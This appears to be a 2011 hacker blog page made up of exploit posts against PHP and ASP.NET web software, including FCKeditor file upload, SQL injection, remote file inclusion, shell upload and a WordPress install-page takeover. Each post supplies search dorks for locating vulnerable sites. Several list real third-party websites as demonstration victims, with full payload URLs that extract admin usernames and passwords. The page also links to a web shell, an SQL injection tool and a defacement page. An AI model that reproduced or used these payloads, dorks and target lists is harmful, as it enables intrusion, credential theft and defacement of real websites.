Wednesday, April 13, 2011

CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit

 

#[~] Author : Mhiman HNc 
#[~] Home   : mhimantrizone.blogspot.com
#[~] E-mail : mhiman@hacker-newbie.org And mhiman@indonesiandefacer.org
#[~] Found  : 06 April 2011.
#[~] Version: CMS Balitbang 3.42. 
#[~] Tested : Windows 7 Ultimate 32bit. 
#[~] Link   : http://www.kajianwebsite.org/download/CMS%203.42-17082010.rar 
#[!] Dork   : inurl:"/html/siswa.php?" 
inurl:"/html/alumni.php?"
              inurl:"/html/guru.php?"
______________________________________________________________
 
 
#[~] Exploited:http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html
 
#[~] Directory:http://public_html/userfiles/file/file-deface.txt
 
Setting:
"editor/filemanager/connectors/php/config.php"
 
$Config['AllowedExtensions']['File']    = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File']        = array() ;
$Config['FileTypesPath']['File']        = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File']        = $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
 
- P.o.C:
1. Target:
Special Site: .sch.id (Indonesian).
 
 
2. http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
   http://www.sman1gombong.sch.id/editor/filemanager/connectors/uploadtest.html
 
3. Find Your Files:
   http://www.sman1gombong.sch.id/userfiles/file/h4ck3d.txt
   http://www.sman1gombong.sch.id/userfiles/h4ck3d.txt
 
 
- Greetz:
All Member Hacker-Newbie.
All Member IndonesianDefacer.

 

dork : allinurl:page_info.php?id_brt=
=============exploit===============
+AND+1=2+UNION+SELECT+1,2,3,4,5,sql c0de,7,8,9,10,11,12,13,14,15,16--
=============Vuln In here===========
http://Target.com/page_info.php?id_brt=70'[your Sql c0de]&id_ktgbr=16

Monday, April 4, 2011


JTL Shop 2 Remote SQL Injection Exploit

# Vendor: www.jtl-software.de
# Version: 2

Google dork :
inurl:druckansicht.php?s=  intitle: JTL-Shop2


POC :
druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--

Target Found :

http://test.jtl-shop.de/schlebert/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://lifestyle.newco4you.de/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://www.tng-equipment.de/JTL-Shop2/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
 


IDEA Web Agency (index.php) Blind SQL Injection Vulnerability

Platform: PHP
CMS Version: All
CMS Download: http://www.ideawebagency.it/

Dork :
inurl:/index.php?i=news&id_news=

Demo: http://www.schivardi.it/index.php?i=news&id_news=[Blind SQL] 


WEBANDHOST CMS SQL Injection Vulnerability

# Software Link: http://www.webandhost.de/
# Version: N/A
# Google dork : 
inurl:"default.php?id=" & intext:"powered by WEBANDHOST"

# Platform / Tested on: linux
# Category: webapplications
# Code : [SQLi]

POC:
http://site.com/default.php?id=1[SQLi]

admin panel : http://site.com/admin/


SnoGrafx (cat.php) SQL Injection Vulnerability

Dork :  "powered by SnoGrafx"

Download Page : http://snografx.com/

Sql Injection POC:
http://localhost/[path]/cat.php?cat=2' (Sql)


Reference : Inj3ct0r


PhotoPost PHP SQL Injection Vulnerability

# Date: 23/07/2010
# Software Link: www.photopost.com
# Version: 4.0 - 4.6
# Tested on: windows xp pack 3
# CVE : N/A

--------------------------exploit------------------------------

dork : Powered by: PhotoPost PHP 4.6

exploit:  www.site.com/photopost/index.php?cat=1 [sql injection]


sNews (index.php) SQL Injection Vulnerability

# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Windows xp SP2
# CVE : N/A
Dork:
"Powered by sNews"

===================================================

[+] Vulnerable File :

http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :

-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

====================================================

Reference : Inj3ct0r.com


LILDBI Shell Upload Vulnerability

# Date: 23.07.2010
# Software Link: http://productos.bvsalud.org/product.php?id=lildbi-web?=en
# Version: 1.2
# Tested on: Ubuntu ( Linux ) - WinXP sp2/sp3


Dork :  allinurl:"/lildbi/

POC :
The shell upload page :  http://target.com/[path]/lildbi/e/admin/uploader.php

File Destination : http://target.com/[path]/lildbi/e/admin/files/[name].php


Arquicomp CMS (fns_db.php) SQL Injection Vulnerability

Date : 17 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
Dork : 
allinurl:carro.php?id_menu=


[Software affected info]
http://www.arquicomp.cl/
http://www.databyte.cl/

[Exploiting..demo]

http://example/carro.php?id_menu=10&id_submenu=[SQL]&padre=30&tipo=1&e=7&c=30


[SQL injection vuln] Elite Gaming Ladders v3.5

Example :http://www.target.com/[path]/standings.php?ladder[id]=SQLi
Dork : inurl:"/standings.php?ladder"
Victim / POC ::: http://www.esportsligen.de/standings.php?ladder[id]='3
ZenPHOTO (Cross Site Scripting in URI) Vulnerability


Vendor: http://www.zenphoto.org/
Date: 2010-05-27
Bug : XSS
Tested on : windows SP2 Français V.(Pnx2 2.0)
Dork :  Powered by zenPHOTO   
POC: http://www.site.com/zenphoto/zp-core/admin.php?

Site! Prof Edition 2.1 CMS SQL Injection Vulnerability

# Product : CMS Site! Professional Edition 2.1
# Vulnerability : SQL Injection
# Dork :  inurl:/index.php?node= &lng=


[0x01] SQL Injections :
# POC :  http://www.site.com/index.php?node=xxx&lng=x[SQLi]
# Demo : http://www.collinadoro.com/index.php?node=51&lng=1[SQLi]
Target Found:

OpenX (phpAdsNew) Remote File inclusion Vulnerability

# Exploit Title: OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: Mhiman HNc
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-

include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----


http://{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

Joomla com_adsmanager SQli Vulnerability

Google dork : inurl:com_adsmanager


Xploit :
DEMO URL : http://psdemo.joomprod.com/index.php?option=com_adsmanager&page=show_ad&adid=[SQli]&catid=15&Itemid=0

Friday, April 1, 2011

M4x SQL injection tool

 http://jundab.files.wordpress.com/2010/10/untitled.jpg 

 Download : http://www.ziddu.com/download/10838196/m4xmssql.exe.html


Php shell devilzc0de

[+]author : devilzc0de
[+]shell : devilzshell php
[+]decode : indolamer.blogspot.com
[+]version: version 1.31
[+]date : 3, july, 2010
[+]genre : web shell php

Download : http://www.ziddu.com/download/10853803/jundabshell.txt.html

Thanks To Jundab


WordPress install.php vulnerability

[+] : Thanks To : Jundab
[+] : Software Link : www.wordpress.org/latest.zip
[+] : Version : All versions of WordPress
[+] : Tested On : Windows Xp, Puppy Knop fs 5
[+] : Google Dork : inurl:wordpress/wp-admin/install.php?step=1
[+] : Code : 127.0.0.1/path/wp-admin/install.php

[-] Find a target : inurl:wordpress/wp-admin/install.php?step=1
——————————————————————–
for example, once a target has been found
http://www.itsmynews.com/blog/wp-admin/install.php?step=1
a login box will appear with the fields weblog title and your email
Weblog title : fill in the title of that WordPress blog, for example
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlH9daSGVAxVMbM8Ms2NaJj7ZPlbWK7J_qYy7wJYfAxEFzh2b-IqZNUnDQCoQcPZhPpevufpgkvg_QEhskyRa51UTS8tUB-V4HUCWclc0hJDteBl0FrWynUE0gHCZEJh0nN_mZFAA_KYJ/s320/untitled.jpg




your email : fill in any email address that is still active
then click “continue to second step >>”
the following will then appear:
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'wp_user_level', '10')' at line 1]
INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (, ‘wp_user_level’, ’10′);
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')' at line 1]
INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (, ‘wp_capabilities’, ‘a:1:{s:13:”administrator”;b:1;}’);
Finished!
Now you can log in with the username “admin” and password “5432ce”.
Note that password carefully! It is a random password that was generated just for you. If you lose it, you will have to delete the tables from the database yourself, and re-install WordPress. So to review:
Username
admin
Password
5432ce
Login address
wp-login.php
Were you expecting more steps? Sorry to disappoint. All done! :)
http://jundab.files.wordpress.com/2010/10/untitled2.jpg?w=300




then look at the very bottom, where the username and password are listed.
Username
admin
Password
5432ce
Login address
wp-login.php
*if WordPress is not installed yet, install it first
127.0.0.1/wp-admin/install.php?step=1

Opencart remote file Upload Vulnerability

#Exploit Title: Opencart remote file upload
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
##################MagelangCyber################
# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the “File Upload” To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
#######################Demo Example####################
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#

 


Sitefinity CMS (ASP.NET) Upload Vulnerability

# Exploit Title: Sitefinity CMS (ASP.NET) Upload Vulnerability
# Date: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : “Sitefinity: Login”

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]


Deface By Mhiman : http://steemer-online.com/mhiman.htm


Thanks To Jundab
